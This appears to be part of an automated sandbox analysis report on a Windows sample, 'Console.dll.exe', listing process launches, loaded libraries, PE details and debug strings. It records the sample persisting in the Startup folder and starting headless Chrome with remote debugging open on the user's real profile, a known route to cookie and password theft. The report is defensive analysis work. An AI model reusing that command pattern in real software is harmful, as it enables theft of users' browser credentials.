            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1788 --field-trial-handle=1528,i,11531674968129144497,11491206366923448469,262144 --disable-features=PaintHolding /prefetch:8
            Source: C:\Users\user\Desktop\Console.dll.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless --user-data-dir="C:\Users\user\AppData\Local\google\chrome\User Data"Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1728 --field-trial-handle=1436,i,4566748188218501428,17155313862400760302,262144 --disable-features=PaintHolding /prefetch:8Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless --user-data-dir="C:\Users\user\AppData\Local\google\chrome\User Data"Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1788 --field-trial-handle=1528,i,11531674968129144497,11491206366923448469,262144 --disable-features=PaintHolding /prefetch:8Jump to behavior
            Source: C:\Users\user\Desktop\Console.dll.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Console.dll.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Console.dll.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Console.dll.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Console.dll.exeSection loaded: icu.dllJump to behavior
            Source: C:\Users\user\Desktop\Console.dll.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Console.dll.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Console.dll.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\Console.dll.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\Console.dll.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Console.dll.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Console.dll.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Console.dll.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Console.dll.exeSection loaded: wshunix.dllJump to behavior
            Source: C:\Users\user\Desktop\Console.dll.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Users\user\Desktop\Console.dll.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Console.dll.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Users\user\Desktop\Console.dll.exeSection loaded: devobj.dllJump to behavior
            Source: C:\Users\user\Desktop\Console.dll.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Console.dll.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Console.dll.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Console.dll.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Console.dll.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeSection loaded: icu.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeSection loaded: wshunix.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeSection loaded: devobj.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: Console.dll.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
            Source: Console.dll.exeStatic file information: File size 77426070 > 1048576
            Source: Console.dll.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x53ba00
            Source: Console.dll.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x138e00
            Source: Console.dll.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x157800
            Source: Console.dll.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: Console.dll.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: Console.dll.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: Console.dll.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Console.dll.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: Console.dll.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Console.dll.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Console.dll.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdb source: Console.dll.exe, 00000000.00000002.1631558379.0000000009C02000.00000002.00000001.01000000.00000014.sdmp, Console.dll.exe, 00000007.00000002.2003149476.0000000009252000.00000002.00000001.01000000.00000014.sdmp
            Source: Binary string: System.Net.Sockets.ni.pdb source: Console.dll.exe, 00000000.00000002.1636211837.000000006C021000.00000020.00000001.01000000.00000025.sdmp, Console.dll.exe, 00000007.00000002.2008453543.000000006C141000.00000020.00000001.01000000.00000025.sdmp
            Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdb source: SQLitePCLRaw.core.dll.0.dr
            Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/Release/net8.0/System.Security.Cryptography.ProtectedData.pdb source: System.Security.Cryptography.ProtectedData.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.Pipes.AccessControl\Release\net8.0-windows\System.IO.Pipes.AccessControl.pdb source: System.IO.Pipes.AccessControl.dll.0.dr
            Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net6.0/Newtonsoft.Json.pdb source: Console.dll.exe, 00000000.00000002.1631322072.0000000009B22000.00000002.00000001.01000000.00000013.sdmp, Console.dll.exe, 00000007.00000002.2003760302.00000000093B2000.00000002.00000001.01000000.00000013.sdmp
            Source: Binary string: /_/artifacts/obj/System.Runtime.InteropServices.RuntimeInformation/Release/net8.0-windows/System.Runtime.InteropServices.RuntimeInformation.pdb source: System.Runtime.InteropServices.RuntimeInformation.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.XmlSerializer\Release\net8.0\System.Xml.XmlSerializer.pdb source: System.Xml.XmlSerializer.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.Compression.ZipFile\Release\net8.0-windows\System.IO.Compression.ZipFile.pdb source: Console.dll.exe, 00000000.00000002.1635631356.000000006BF51000.00000020.00000001.01000000.0000002B.sdmp, Console.dll.exe, 00000007.00000002.2011990883.000000006ED91000.00000020.00000001.01000000.0000002B.sdmp, System.IO.Compression.ZipFile.dll.0.dr
            Source: Binary string: /_/artifacts/obj/Microsoft.VisualBasic/Release/net8.0-windows/Microsoft.VisualBasic.pdb source: Console.dll.exe
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.Lightweight\Release\net8.0\System.Reflection.Emit.Lightweight.pdb source: System.Reflection.Emit.Lightweight.dll.0.dr
            Source: Binary string: /_/artifacts/obj/System.Security.Permissions/netcoreapp3.0-Release/System.Security.Permissions.pdbSHA256 source: System.Security.Permissions.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Concurrent\Release\net8.0\System.Collections.Concurrent.pdbSHA256Y source: Console.dll.exe
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.Lightweight\Release\net8.0\System.Reflection.Emit.Lightweight.pdbSHA2567 source: System.Reflection.Emit.Lightweight.dll.0.dr
            Source: Binary string: /_/artifacts/obj/netstandard/Release/net8.0-windows/netstandard.pdbSHA256 source: Console.dll.exe, 00000000.00000002.1630061782.00000000095C2000.00000002.00000001.01000000.00000012.sdmp, Console.dll.exe, 00000007.00000002.2002875907.0000000009212000.00000002.00000001.01000000.00000012.sdmp, netstandard.dll.0.dr
            Source: Binary string: Microsoft.Win32.Registry.ni.pdb source: Console.dll.exe, Microsoft.Win32.Registry.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography\Release\net8.0-windows\System.Security.Cryptography.pdb source: Console.dll.exe, 00000000.00000002.1636900853.000000006C161000.00000020.00000001.01000000.0000001E.sdmp, Console.dll.exe, 00000007.00000002.2008903871.000000006C241000.00000020.00000001.01000000.0000001E.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.TypeExtensions\Release\net8.0\System.Reflection.TypeExtensions.pdb source: System.Reflection.TypeExtensions.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdbSHA256 source: Console.dll.exe, 00000000.00000002.1630204693.0000000009612000.00000002.00000001.01000000.00000007.sdmp, Console.dll.exe, 00000007.00000002.2001237728.0000000008C42000.00000002.00000001.01000000.00000007.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Intrinsics\Release\net8.0\System.Runtime.Intrinsics.pdbSHA256 source: Console.dll.exe, 00000000.00000002.1634300622.000000000C512000.00000002.00000001.01000000.00000029.sdmp, Console.dll.exe, 00000007.00000002.2006961538.000000000BF12000.00000002.00000001.01000000.00000029.sdmp
            Source: Binary string: System.Net.Security.ni.pdb source: Console.dll.exe, 00000000.00000002.1637368527.000000006C321000.00000020.00000001.01000000.0000001D.sdmp, Console.dll.exe, 00000007.00000002.2009258899.000000006C401000.00000020.00000001.01000000.0000001D.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.Compression.ZipFile\Release\net8.0-windows\System.IO.Compression.ZipFile.pdbSHA256 source: Console.dll.exe, 00000000.00000002.1635631356.000000006BF51000.00000020.00000001.01000000.0000002B.sdmp, Console.dll.exe, 00000007.00000002.2011990883.000000006ED91000.00000020.00000001.01000000.0000002B.sdmp, System.IO.Compression.ZipFile.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.TypeConverter\Release\net8.0\System.ComponentModel.TypeConverter.pdbSHA256x source: Console.dll.exe, 00000000.00000002.1642766032.000000006C7B1000.00000020.00000001.01000000.00000016.sdmp, Console.dll.exe, 00000007.00000002.2010033450.000000006C851000.00000020.00000001.01000000.00000016.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.NonGeneric\Release\net8.0\System.Collections.NonGeneric.pdb source: Console.dll.exe, 00000000.00000002.1646860500.000000006FAC1000.00000020.00000001.01000000.0000002C.sdmp, Console.dll.exe, 00000007.00000002.2013487031.0000000070161000.00000020.00000001.01000000.0000002C.sdmp
            Source: Binary string: System.ObjectModel.ni.pdb source: Console.dll.exe, 00000000.00000002.1646976071.0000000073C61000.00000020.00000001.01000000.00000017.sdmp, Console.dll.exe, 00000007.00000002.2013616333.0000000073C61000.00000020.00000001.01000000.00000017.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Concurrent\Release\net8.0\System.Collections.Concurrent.pdb source: Console.dll.exe
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NameResolution\Release\net8.0-windows\System.Net.NameResolution.pdb source: Console.dll.exe, 00000000.00000002.1635971545.000000006C001000.00000020.00000001.01000000.00000027.sdmp, Console.dll.exe, 00000007.00000002.2008280739.000000006C121000.00000020.00000001.01000000.00000027.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x86\Release\System.Private.CoreLib.pdb source: Console.dll.exe, 00000000.00000002.1645448627.000000006CC41000.00000020.00000001.01000000.00000005.sdmp, Console.dll.exe, 00000007.00000002.2010963718.000000006CC41000.00000020.00000001.01000000.00000005.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x86.Release\dlls\mscordac\mscordaccore.pdb source: Console.dll.exe, Console.dll.exe.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net8.0\System.Diagnostics.Tracing.pdb source: Console.dll.exe, 00000000.00000002.1631801024.0000000009C42000.00000002.00000001.01000000.0000001A.sdmp, Console.dll.exe, 00000007.00000002.2003908860.0000000009472000.00000002.00000001.01000000.0000001A.sdmp, System.Diagnostics.Tracing.dll.0.dr
            Source: Binary string: System.Diagnostics.TextWriterTraceListener.ni.pdb source: System.Diagnostics.TextWriterTraceListener.dll.0.dr
            Source: Binary string: /_/artifacts/obj/System.Resources.ResourceManager/Release/net8.0-windows/System.Resources.ResourceManager.pdbSHA256=l source: System.Resources.ResourceManager.dll.0.dr
            Source: Binary string: System.Collections.ni.pdb source: Console.dll.exe, 00000000.00000002.1646723335.000000006EDC1000.00000020.00000001.01000000.00000008.sdmp, Console.dll.exe, 00000007.00000002.2013312223.000000006FAA1000.00000020.00000001.01000000.00000008.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdbSHA256 source: Console.dll.exe, 00000000.00000002.1638351948.000000006C631000.00000020.00000001.01000000.00000018.sdmp, Console.dll.exe, 00000007.00000002.2009638328.000000006C6D1000.00000020.00000001.01000000.00000018.sdmp
            Source: Binary string: System.Private.CoreLib.ni.pdb source: Console.dll.exe, 00000000.00000002.1645448627.000000006CC41000.00000020.00000001.01000000.00000005.sdmp, Console.dll.exe, 00000007.00000002.2010963718.000000006CC41000.00000020.00000001.01000000.00000005.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Private.Uri\Release\net8.0\System.Private.Uri.pdb source: Console.dll.exe, 00000000.00000002.1636729872.000000006C121000.00000020.00000001.01000000.0000001F.sdmp, Console.dll.exe, 00000007.00000002.2008763140.000000006C201000.00000020.00000001.01000000.0000001F.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Primitives\Release\net8.0-windows\System.Net.Primitives.pdb source: Console.dll.exe, 00000000.00000002.1638168932.000000006C5F1000.00000020.00000001.01000000.00000019.sdmp, Console.dll.exe, 00000007.00000002.2012133277.000000006EDC1000.00000020.00000001.01000000.00000019.sdmp
            Source: Binary string: /_/artifacts/obj/System.Dynamic.Runtime/Release/net8.0-windows/System.Dynamic.Runtime.pdb source: System.Dynamic.Runtime.dll.0.dr
            Source: Binary string: System.Runtime.InteropServices.ni.pdb.MRH source: Console.dll.exe, 00000000.00000002.1646500548.000000006EC51000.00000020.00000001.01000000.0000000C.sdmp, Console.dll.exe, 00000007.00000002.2012640726.000000006FA01000.00000020.00000001.01000000.0000000C.sdmp, System.Runtime.InteropServices.dll.0.dr
            Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/Release/net8.0/System.Security.Cryptography.ProtectedData.pdbSHA256;z source: System.Security.Cryptography.ProtectedData.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net8.0\System.Text.Encoding.Extensions.pdbSHA256{) source: Console.dll.exe, 00000000.00000002.1629588247.0000000009532000.00000002.00000001.01000000.00000010.sdmp, Console.dll.exe, 00000007.00000002.2002494018.0000000009192000.00000002.00000001.01000000.00000010.sdmp
            Source: Binary string: System.Private.Uri.ni.pdb1 source: Console.dll.exe, 00000000.00000002.1636729872.000000006C121000.00000020.00000001.01000000.0000001F.sdmp, Console.dll.exe, 00000007.00000002.2008763140.000000006C201000.00000020.00000001.01000000.0000001F.sdmp
            Source: Binary string: System.Runtime.Serialization.Primitives.ni.pdb source: System.Runtime.Serialization.Primitives.dll.0.dr
            Source: Binary string: /_/artifacts/obj/System.Reflection.Extensions/Release/net8.0-windows/System.Reflection.Extensions.pdb source: System.Reflection.Extensions.dll.0.dr
            Source: Binary string: /_/artifacts/obj/System.Reflection.Extensions/Release/net8.0-windows/System.Reflection.Extensions.pdbSHA256 source: System.Reflection.Extensions.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.CSharp\Release\net8.0-windows\Microsoft.CSharp.pdb source: Console.dll.exe, Microsoft.CSharp.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading\Release\net8.0\System.Threading.pdb source: Console.dll.exe, 00000000.00000002.1645066855.000000006CBA1000.00000020.00000001.01000000.0000000F.sdmp, Console.dll.exe, 00000007.00000002.2012314955.000000006F8D1000.00000020.00000001.01000000.0000000F.sdmp, System.Threading.dll.0.dr
            Source: Binary string: System.Reflection.TypeExtensions.ni.pdb source: System.Reflection.TypeExtensions.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.WebSockets\Release\net8.0-windows\System.Net.WebSockets.pdb source: System.Net.WebSockets.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdbSHA256 source: Console.dll.exe, 00000000.00000002.1631558379.0000000009C02000.00000002.00000001.01000000.00000014.sdmp, Console.dll.exe, 00000007.00000002.2003149476.0000000009252000.00000002.00000001.01000000.00000014.sdmp
            Source: Binary string: /_/artifacts/obj/System.Runtime.InteropServices.RuntimeInformation/Release/net8.0-windows/System.Runtime.InteropServices.RuntimeInformation.pdbSHA256 source: System.Runtime.InteropServices.RuntimeInformation.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ObjectModel\Release\net8.0\System.ObjectModel.pdb source: Console.dll.exe, 00000000.00000002.1646976071.0000000073C61000.00000020.00000001.01000000.00000017.sdmp, Console.dll.exe, 00000007.00000002.2013616333.0000000073C61000.00000020.00000001.01000000.00000017.sdmp
            Source: Binary string: System.IO.Compression.ni.pdbU source: Console.dll.exe, 00000000.00000002.1635734665.000000006BF61000.00000020.00000001.01000000.0000002A.sdmp, Console.dll.exe, 00000007.00000002.2008096157.000000006C051000.00000020.00000001.01000000.0000002A.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Memory\Release\net8.0\System.Memory.pdbSHA256 source: Console.dll.exe, 00000000.00000002.1645167317.000000006CBC1000.00000020.00000001.01000000.0000000D.sdmp, Console.dll.exe, 00000007.00000002.2012440781.000000006F9D1000.00000020.00000001.01000000.0000000D.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.TextWriterTraceListener\Release\net8.0\System.Diagnostics.TextWriterTraceListener.pdb source: System.Diagnostics.TextWriterTraceListener.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Primitives\Release\net8.0\System.Runtime.Serialization.Primitives.pdbSHA256 source: System.Runtime.Serialization.Primitives.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdbSHA256{) source: Console.dll.exe, 00000000.00000002.1634238960.000000000C502000.00000002.00000001.01000000.00000028.sdmp, Console.dll.exe, 00000007.00000002.2006811873.000000000BD42000.00000002.00000001.01000000.00000028.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Memory\Release\net8.0\System.Memory.pdb source: Console.dll.exe, 00000000.00000002.1645167317.000000006CBC1000.00000020.00000001.01000000.0000000D.sdmp, Console.dll.exe, 00000007.00000002.2012440781.000000006F9D1000.00000020.00000001.01000000.0000000D.sdmp
            Source: Binary string: /_/artifacts/obj/System.IO.UnmanagedMemoryStream/Release/net8.0-windows/System.IO.UnmanagedMemoryStream.pdb source: System.IO.UnmanagedMemoryStream.dll.0.dr
            Source: Binary string: /_/artifacts/obj/netstandard/Release/net8.0-windows/netstandard.pdb source: Console.dll.exe, 00000000.00000002.1630061782.00000000095C2000.00000002.00000001.01000000.00000012.sdmp, Console.dll.exe, 00000007.00000002.2002875907.0000000009212000.00000002.00000001.01000000.00000012.sdmp, netstandard.dll.0.dr
            Source: Binary string: Microsoft.Win32.Registry.ni.pdb} source: Console.dll.exe, Microsoft.Win32.Registry.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NameResolution\Release\net8.0-windows\System.Net.NameResolution.pdbSHA256 source: Console.dll.exe, 00000000.00000002.1635971545.000000006C001000.00000020.00000001.01000000.00000027.sdmp, Console.dll.exe, 00000007.00000002.2008280739.000000006C121000.00000020.00000001.01000000.00000027.sdmp
            Source: Binary string: C:\Users\Gaming\source\repos\Console\Console\obj\Release\net8.0\win-x86\Console.pdb source: Console.dll.exe
            Source: Binary string: System.Linq.Expressions.ni.pdb{ source: Console.dll.exe, 00000000.00000002.1643170420.000000006C861000.00000020.00000001.01000000.00000015.sdmp, Console.dll.exe, 00000007.00000002.2010341131.000000006C901000.00000020.00000001.01000000.00000015.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdbSHA256 source: Console.dll.exe
            Source: Binary string: System.Net.NameResolution.ni.pdb source: Console.dll.exe, 00000000.00000002.1635971545.000000006C001000.00000020.00000001.01000000.00000027.sdmp, Console.dll.exe, 00000007.00000002.2008280739.000000006C121000.00000020.00000001.01000000.00000027.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.TypeConverter\Release\net8.0\System.ComponentModel.TypeConverter.pdb source: Console.dll.exe, 00000000.00000002.1642766032.000000006C7B1000.00000020.00000001.01000000.00000016.sdmp, Console.dll.exe, 00000007.00000002.2010033450.000000006C851000.00000020.00000001.01000000.00000016.sdmp
            Source: Binary string: /_/artifacts/obj/System.Runtime.Serialization/Release/net8.0-windows/System.Runtime.Serialization.pdb source: System.Runtime.Serialization.dll.0.dr
            Source: Binary string: System.Diagnostics.DiagnosticSource.ni.pdbg source: Console.dll.exe, 00000000.00000002.1637593746.000000006C3C1000.00000020.00000001.01000000.0000001C.sdmp, Console.dll.exe, 00000007.00000002.2009427893.000000006C4A1000.00000020.00000001.01000000.0000001C.sdmp, System.Diagnostics.DiagnosticSource.dll.0.dr
            Source: Binary string: Microsoft.VisualBasic.Core.ni.pdbz source: Console.dll.exe
            Source: Binary string: System.Diagnostics.DiagnosticSource.ni.pdb source: Console.dll.exe, 00000000.00000002.1637593746.000000006C3C1000.00000020.00000001.01000000.0000001C.sdmp, Console.dll.exe, 00000007.00000002.2009427893.000000006C4A1000.00000020.00000001.01000000.0000001C.sdmp, System.Diagnostics.DiagnosticSource.dll.0.dr
            Source: Binary string: System.Threading.ni.pdb source: Console.dll.exe, 00000000.00000002.1645066855.000000006CBA1000.00000020.00000001.01000000.0000000F.sdmp, Console.dll.exe, 00000007.00000002.2012314955.000000006F8D1000.00000020.00000001.01000000.0000000F.sdmp, System.Threading.dll.0.dr
            Source: Binary string: System.Threading.Tasks.Parallel.ni.pdb source: System.Threading.Tasks.Parallel.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq.Expressions\Release\net8.0\System.Linq.Expressions.pdb source: Console.dll.exe, 00000000.00000002.1643170420.000000006C861000.00000020.00000001.01000000.00000015.sdmp, Console.dll.exe, 00000007.00000002.2010341131.000000006C901000.00000020.00000001.01000000.00000015.sdmp
            Source: Binary string: /_/artifacts/obj/System.Configuration/Release/net8.0-windows/System.Configuration.pdbSHA256> source: System.Configuration.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.Compression\Release\net8.0-windows\System.IO.Compression.pdbSHA2562aj source: Console.dll.exe, 00000000.00000002.1635734665.000000006BF61000.00000020.00000001.01000000.0000002A.sdmp, Console.dll.exe, 00000007.00000002.2008096157.000000006C051000.00000020.00000001.01000000.0000002A.sdmp
            Source: Binary string: System.Net.Sockets.ni.pdbX^ source: Console.dll.exe, 00000000.00000002.1636211837.000000006C021000.00000020.00000001.01000000.00000025.sdmp, Console.dll.exe, 00000007.00000002.2008453543.000000006C141000.00000020.00000001.01000000.00000025.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices\Release\net8.0\System.Runtime.InteropServices.pdb source: Console.dll.exe, 00000000.00000002.1646500548.000000006EC51000.00000020.00000001.01000000.0000000C.sdmp, Console.dll.exe, 00000007.00000002.2012640726.000000006FA01000.00000020.00000001.01000000.0000000C.sdmp, System.Runtime.InteropServices.dll.0.dr
            Source: Binary string: /_/artifacts/obj/System.AppContext/Release/net8.0-windows/System.AppContext.pdbSHA256 source: Console.dll.exe
            Source: Binary string: System.Security.Cryptography.ni.pdb, source: Console.dll.exe, 00000000.00000002.1636900853.000000006C161000.00000020.00000001.01000000.0000001E.sdmp, Console.dll.exe, 00000007.00000002.2008903871.000000006C241000.00000020.00000001.01000000.0000001E.sdmp
            Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Algorithms/Release/net8.0-windows/System.Security.Cryptography.Algorithms.pdbSHA256 source: System.Security.Cryptography.Algorithms.dll.0.dr
            Source: Binary string: C:\Users\Gaming\source\repos\Console\Console\obj\Release\net8.0\win-x86\Console.pdbSHA256 source: Console.dll.exe
            Source: Binary string: /_/artifacts/obj/System.Buffers/Release/net8.0-windows/System.Buffers.pdbSHA256 source: Console.dll.exe, System.Buffers.dll.0.dr
